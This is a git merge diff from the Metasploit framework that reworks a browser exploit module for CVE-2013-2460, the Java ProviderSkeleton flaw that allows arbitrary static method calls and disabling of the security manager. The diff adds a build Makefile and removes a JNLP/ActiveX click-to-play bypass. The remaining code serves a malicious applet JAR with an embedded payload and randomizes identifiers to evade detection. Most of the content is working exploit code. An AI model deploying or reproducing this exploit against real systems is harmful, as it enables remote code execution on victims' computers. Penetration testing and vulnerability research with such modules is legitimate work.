Merge pull request #2 from jvazquez-r7/provider_skeleton_clean

provider_skeleton Exploit Clean and Fixes

external/source/exploits/cve-2013-2460/Makefile

@@ -0,0 +1,19 @@
+CLASSES = \
+	ExpProvider.class \
+	DisableSecurityManagerAction.class \
+	Exploit.class
+
+.SUFFIXES: .java .class
+.java.class:
+	javac -source 1.2 -target 1.2 -cp "../../../../data/java:." $*.java
+
+all: $(CLASSES:.java=.class)
+
+install:
+	mv ExpProvider.class ../../../../data/exploits/cve-2013-2460/
+	mv DisableSecurityManagerAction.class ../../../../data/exploits/cve-2013-2460/
+	mv Exploit.class ../../../../data/exploits/cve-2013-2460/
+
+clean:
+	rm -rf *.class
+

external/source/exploits/provider_skeleton/.classpath

@@ -1,7 +0,0 @@
-<?xml version="1.0" encoding="UTF-8"?>
-<classpath>
-	<classpathentry kind="src" path="src"/>
-	<classpathentry kind="con" path="org.eclipse.jdt.launching.JRE_CONTAINER/org.eclipse.jdt.internal.debug.ui.launcher.StandardVMType/jdk1.7.0_21"/>
-	<classpathentry kind="lib" path="C:/dev/metasploit.jar"/>
-	<classpathentry kind="output" path="bin"/>
-</classpath>

external/source/exploits/provider_skeleton/.project

@@ -1,17 +0,0 @@
-<?xml version="1.0" encoding="UTF-8"?>
-<projectDescription>
-	<name>msf_issue61</name>
-	<comment></comment>
-	<projects>
-	</projects>
-	<buildSpec>
-		<buildCommand>
-			<name>org.eclipse.jdt.core.javabuilder</name>
-			<arguments>
-			</arguments>
-		</buildCommand>
-	</buildSpec>
-	<natures>
-		<nature>org.eclipse.jdt.core.javanature</nature>
-	</natures>
-</projectDescription>

external/source/exploits/provider_skeleton/.settings/org.eclipse.jdt.core.prefs

@@ -1,11 +0,0 @@
-eclipse.preferences.version=1
-org.eclipse.jdt.core.compiler.codegen.inlineJsrBytecode=enabled
-org.eclipse.jdt.core.compiler.codegen.targetPlatform=1.7
-org.eclipse.jdt.core.compiler.codegen.unusedLocal=preserve
-org.eclipse.jdt.core.compiler.compliance=1.7
-org.eclipse.jdt.core.compiler.debug.lineNumber=generate
-org.eclipse.jdt.core.compiler.debug.localVariable=generate
-org.eclipse.jdt.core.compiler.debug.sourceFile=generate
-org.eclipse.jdt.core.compiler.problem.assertIdentifier=error
-org.eclipse.jdt.core.compiler.problem.enumIdentifier=error
-org.eclipse.jdt.core.compiler.source=1.7

modules/exploits/multi/browser/java_jre17_provider_skeleton.rb

@@ -9,7 +9,7 @@ require 'msf/core'
 require 'rex'
 
 class Metasploit3 < Msf::Exploit::Remote
-	Rank = ExcellentRanking
+	Rank = GreatRanking # Because there isn't click2play bypass, plus now Java Security Level High by default
 
 	include Msf::Exploit::Remote::HttpServer::HTML
 	include Msf::Exploit::EXE
@@ -17,6 +17,8 @@ class Metasploit3 < Msf::Exploit::Remote
 	include Msf::Exploit::Remote::BrowserAutopwn
 	autopwn_info({ :javascript => false })
 
+	EXPLOIT_STRING = "Exploit"
+
 	def initialize( info = {} )
 
 		super( update_info( info,
@@ -24,19 +26,20 @@ class Metasploit3 < Msf::Exploit::Remote
 			'Description'   => %q{
 					This module abuses the insecure invoke() method of the ProviderSkeleton class that
 				allows to call arbitrary static methods with user supplied arguments. The vulnerability
-				affects Java version 7u21 and earlier. This exploit bypasses click-to-play on Internet Explorer
+				affects Java version 7u21 and earlier.
-				and throws a specially crafted JNLP file. This bypass is applicable mainly to IE, where Java
-				Web Start can be launched automatically through the ActiveX control. Otherwise, the
-				applet is launched without click-to-play bypass.
 			},
 			'License'       => MSF_LICENSE,
 			'Author'        =>
 				[
-					'Adam Gowdiak',  # Vulnerability discovery according to Oracle's advisor and also POC
+					'Adam Gowdiak', # Vulnerability discovery according to Oracle's advisory and also POC
 					'Matthias Kaiser' # Metasploit module
 				],
 			'References'    =>
 				[
+					[ 'CVE', '2013-2460' ],
+					[ 'OSVDB', '94346' ],
+					[ 'URL', 'http://www.oracle.com/technetwork/topics/security/javacpujun2013-1899847.html'],
+					[ 'URL', 'http://hg.openjdk.java.net/jdk7u/jdk7u/jdk/rev/160cde99bb1a' ],
 					[ 'URL', 'http://www.security-explorations.com/materials/SE-2012-01-ORACLE-12.pdf' ],
 					[ 'URL', 'http://www.security-explorations.com/materials/se-2012-01-61.zip' ]
 				],
@@ -74,68 +77,40 @@ class Metasploit3 < Msf::Exploit::Remote
 		))
 	end
 
-
+	def randomize_identifier_in_jar(jar, identifier)
-	def setup
+		identifier_str = rand_text_alpha(identifier.length)
-		path = File.join(Msf::Config.install_root, "data", "exploits", "provider_skeleton", "Exploit.class")
+		jar.entries.each { |entry|
-		@exploit_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }
+			entry.name.gsub!(identifier, identifier_str)
-		path = File.join(Msf::Config.install_root, "data", "exploits", "provider_skeleton", "ExpProvider.class")
+			entry.data = entry.data.gsub(identifier, identifier_str)
-		@provider_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }
+		}
-		path = File.join(Msf::Config.install_root, "data", "exploits", "provider_skeleton", "DisableSecurityManagerAction.class")
-		@action_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }
-
-		@exploit_class_name = rand_text_alpha("Exploit".length)
-		@exploit_class.gsub!("Exploit", @exploit_class_name)
-
-		@jnlp_name = rand_text_alpha(8)
-
-		super
 	end
 
-	def jnlp_file
-		jnlp_uri = "#{get_uri}/#{@jnlp_name}.jnlp"
 
-		jnlp = %Q|
+	def setup
-<?xml version="1.0" encoding="utf-8"?>
+		path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-2460", "Exploit.class")
-<jnlp spec="1.0" xmlns:jfx="http://javafx.com" href="#{jnlp_uri}">
+		@exploit_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }
-	<information>
+		path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-2460", "ExpProvider.class")
-		<title>Applet Test JNLP</title>
+		@provider_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }
-		<vendor>#{rand_text_alpha(8)}</vendor>
+		path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-2460", "DisableSecurityManagerAction.class")
-		<description>#{rand_text_alpha(8)}</description>
+		@action_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }
-		<offline-allowed/>
-	</information>
 
-	<resources>
+		@exploit_class_name = rand_text_alpha(EXPLOIT_STRING.length)
-		<j2se version="1.7+" href="http://java.sun.com/products/autodl/j2se" />
+		@exploit_class.gsub!(EXPLOIT_STRING, @exploit_class_name)
-		<jar href="#{rand_text_alpha(8)}.jar" main="true" />
+
-	</resources>
+		super
-	<applet-desc name="#{rand_text_alpha(8)}" main-class="#{@exploit_class_name}" width="1" height="1">
-		<param name="__applet_ssv_validated" value="true"></param>
-	</applet-desc>
-	<update check="background"/>
-</jnlp>
-		|
-		return jnlp
 	end
 
 	def on_request_uri(cli, request)
 		print_status("handling request for #{request.uri}")
 
 		case request.uri
-		when /\.jnlp$/i
-			send_response(cli, jnlp_file, { 'Content-Type' => "application/x-java-jnlp-file" })
 		when /\.jar$/i
 			jar = payload.encoded_jar
 			jar.add_file("#{@exploit_class_name}.class", @exploit_class)
 			jar.add_file("ExpProvider.class", @provider_class)
 			jar.add_file("DisableSecurityManagerAction.class", @action_class)
-			metasploit_str = rand_text_alpha("metasploit".length)
+			randomize_identifier_in_jar(jar, "metasploit")
-			payload_str = rand_text_alpha("payload".length)
+			randomize_identifier_in_jar(jar, "payload")
-			jar.entries.each { |entry|
-				entry.name.gsub!("metasploit", metasploit_str)
-				entry.name.gsub!("Payload", payload_str)
-				entry.data = entry.data.gsub("metasploit", metasploit_str)
-				entry.data = entry.data.gsub("Payload", payload_str)
-			}
 			jar.build_manifest
 
 			send_response(cli, jar, { 'Content-Type' => "application/octet-stream" })
@@ -154,18 +129,10 @@ class Metasploit3 < Msf::Exploit::Remote
 	end
 
 	def generate_html
-		jnlp_uri = "#{get_uri}/#{@jnlp_name}.jnlp"
-
-		# When the browser is IE, the ActvX is used in order to load the malicious JNLP, allowing click2play bypass
-		# Else an <applet> tag is used to load the malicious applet, this time there isn't click2play bypass
 		html = %Q|
 		<html>
 		<body>
-		<object codebase="http://java.sun.com/update/1.6.0/jinstall-6-windows-i586.cab#Version=6,0,0,0" classid="clsid:5852F5ED-8BF4-11D4-A245-0080C6F74284" height=0 width=0>
+		<applet archive="#{rand_text_alpha(rand(5) + 3)}.jar" code="#{@exploit_class_name}.class" width="1" height="1"></applet>
-		<param name="app" value="#{jnlp_uri}">
-		<param name="back" value="true">
-		<applet archive="#{rand_text_alpha(8)}.jar" code="#{@exploit_class_name}.class" width="1" height="1"></applet>
-		</object>
 		</body>
 		</html>
 		|